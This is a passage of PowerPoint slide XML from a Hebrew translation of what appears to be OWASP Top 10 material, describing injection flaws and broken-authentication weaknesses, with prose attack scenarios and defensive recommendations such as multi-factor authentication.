                        <a:t>). חולשות הזרקת קוד זדוני מאד שכיחות במיוחד בקוד תוכנה מיושן. לרוב הן ימצאו בשאילתות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, שאילתות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>LDAP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Xpath</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, שאילתות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NoSQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, פקודות מערכת הפעלה, מתרגמי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SMTP Headers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, שפות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ושאילתות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ORM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. חולשות הזרקת קוד זדוני קלות לזיהוי כאשר בוחנים את הקוד. מוצרים כגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>scanners </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>fuzzers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> יכולים לעזור לתוקפים למצוא אותן.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הזרקת קוד זדוני יכולה להסתיים באובדן או השחתה של מידע, חוסר בנשיאה באחריות או מתקפת מניעת גישה. הזרקת קוד זדוני עשויה לעתים להוביל להשתלטות זדונית על שרת או אתר אינטרנט. ההשפעה העסקית תלויה בדרישות היישום או המידע עצמו.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34589646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Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="6372000"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ביצוע </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, שימוש </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ברשימת סיסמאות ידועה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, הינה מתקפה נפוצה. במידה ויישום אינו מיישם מנגנוני הגנה ממוכנים, ניתן להשתמש ביישום כ-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> על-מנת לוודא שהסיסמאות בתוקף.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מרבית מתקפות ההזדהות מתרחשות כתוצאה משימוש בסיסמא כגורם אימות יחיד. ברגע ששוקלים </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>best practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, החלפת סיסמאות ודרישה למורכבות סיסמא מעודדות משתמשים להשתמש ולחזור להשתמש בסיסמאות חלשות. מומלץ לארגונים להפסיק שימוש בשיטות אלו בהתאם למסמך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NIST 800-63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ולעבור לשימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>multi-factor authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> יישומים אינם מיישמים מנגנוני ניתוק בצורה נאותה. משתמש מבצע שימוש במחשב ציבורי לגישה ליישום. במקום לבחור ב"ניתוק", המשתמש סוגר את הדפדפן ועוזב את המחשב. תוקף משתמש באותו דפדפן כשעה לאחר מכן ועדיין מזוהה במערכת.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="3132000"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>וידוא זהות המשתמש, אימות, וניהול ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מהותיים להגנה מפני מתקפות מבוססות-הזדהות.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ייתכן וקיימות חולשות הזדהות ביישום:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האפשרות להריץ מתקפות ממוכנות כגון  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, כאשר התוקף מחזיק ברשימה של נתוני הזדהות בתוקף.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האפשרות להריץ מתקפות מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>brute force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או מתקפות ממוכנות אחרות.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האפשרות להשתמש בסיסמאות ברירת מחדל, סיסמאות חלשות או סיסמאות ידועות מראש כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“Password1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
